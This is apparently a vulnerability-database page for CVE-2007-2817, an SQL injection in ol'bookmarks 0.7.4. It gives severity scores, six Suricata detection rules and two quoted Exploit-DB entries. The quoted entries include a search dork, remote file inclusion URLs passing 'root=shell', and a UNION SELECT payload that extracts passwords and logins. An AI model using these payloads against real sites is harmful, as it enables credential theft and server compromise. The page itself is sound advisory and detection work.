CVE-2007-2817
published 2007-05-22CVE-2007-2817: SQL injection vulnerability in read/index.php in ol'bookmarks 0.7.4 allows remote attackers to execute arbitrary SQL commands via the id parameter.
PriorityP338high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.05%
60.0th percentile
SQL injection vulnerability in read/index.php in ol'bookmarks 0.7.4 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ol_bookmarks | ol_bookmarks | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-2817 [HIGH] ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id UNION SELECT
ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id UNION SELECT"; flow:established,to_server; http.uri; content:"/read/index.php?"; nocase; content:"id="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-2817; reference:url,www.milw0rm.com/exploits/3964; classtype:web-application-attack; sid:2004006; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_tec
Suricata
ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2007-2817 [HIGH] ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id INSERT
ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id INSERT"; flow:established,to_server; http.uri; content:"/read/index.php?"; nocase; content:"id="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2007-2817; reference:url,www.milw0rm.com/exploits/3964; classtype:web-application-attack; sid:2004007; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T11
Suricata
ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-2817 [HIGH] ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id ASCII
ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id ASCII"; flow:established,to_server; http.uri; content:"/read/index.php?"; nocase; content:"id="; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-2817; reference:url,www.milw0rm.com/exploits/3964; classtype:web-application-attack; sid:2004009; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T11
Suricata
ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-2817 [HIGH] ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id DELETE
ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id DELETE"; flow:established,to_server; http.uri; content:"/read/index.php?"; nocase; content:"id="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-2817; reference:url,www.milw0rm.com/exploits/3964; classtype:web-application-attack; sid:2004008; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T11
Suricata
ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-2817 [HIGH] ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id UPDATE
ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id UPDATE"; flow:established,to_server; http.uri; content:"/read/index.php?"; nocase; content:"id="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2007-2817; reference:url,www.milw0rm.com/exploits/3964; classtype:web-application-attack; sid:2004010; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T119
Suricata
ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-2817 [HIGH] ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id SELECT
ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id SELECT"; flow:established,to_server; http.uri; content:"/read/index.php?"; nocase; content:"id="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-2817; reference:url,www.milw0rm.com/exploits/3964; classtype:web-application-attack; sid:2004005; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T11
Exploit-DB
Ol BookMarks Manager 0.7.4 - 'root' Remote File Inclusion
exploitdb·2007-05-21
CVE-2008-6409 Ol BookMarks Manager 0.7.4 - 'root' Remote File Inclusion
Ol BookMarks Manager 0.7.4 - 'root' Remote File Inclusion
---
#Olbookmarks =>0.7.4 multiple RFI (root)
Download script :
#D0rk : allintitle:ol'bookmarks
#Thanks Str0ke
#Exploit : http://mesh.dl.sourceforge.net/sourceforge/olbookmarks/olbookmarks-0.7.4.tar.gz
#http://victime.com/olbookmarks-0.7.4/themes/test1.php?root=shell
#http://victime.com/path/themes/blackorange.php?root=shell
#http://victime.com/path/theme/default.php?root=shell
#http://victime.com/path/theme/frames1.php?root=shell
#http://victime.com/path/theme/frames1_top.php?root=shell
#http://victime.com/path/theme/test1.php?root=shell
#http://victime.com/path/theme/test2.php?root=shell
#http://victime.com/path/theme/test3.php?root=shell
#http://victime.com/path/theme/test4.php?root=shell
#http://victime.com/path/t
Exploit-DB
Ol BookMarks Manager 0.7.4 - SQL Injection
exploitdb·2007-05-21
CVE-2008-6409 Ol BookMarks Manager 0.7.4 - SQL Injection
Ol BookMarks Manager 0.7.4 - SQL Injection
---
Ol Bookmarks Manager 0.7.4 (root) Remote SQL Injection Vulnerabilities
Found by: Cyber-Security
D0rk : allintitle:ol'bookmarks
Download: http://mesh.dl.sourceforge.net/sourceforge/olbookmarks/olbookmarks-0.7.4.tar.gz
/read/index.php?name=alex&id=-1/**/union/**/select/**/0,1,2,3,4,5,password,login,8,9,10,11,12/**/from/**/preferences/*
Example: http://www.blex.co.uk/bookmarks
thanx: ThE TiGeR couse he found RFI to this script:)
# milw0rm.com [2007-05-21]
No writeups or analysis indexed.
http://osvdb.org/36492http://secunia.com/advisories/25356http://www.securityfocus.com/bid/24085https://exchange.xforce.ibmcloud.com/vulnerabilities/34414https://www.exploit-db.com/exploits/3964http://osvdb.org/36492http://secunia.com/advisories/25356http://www.securityfocus.com/bid/24085https://exchange.xforce.ibmcloud.com/vulnerabilities/34414https://www.exploit-db.com/exploits/3964
2007-05-22
Published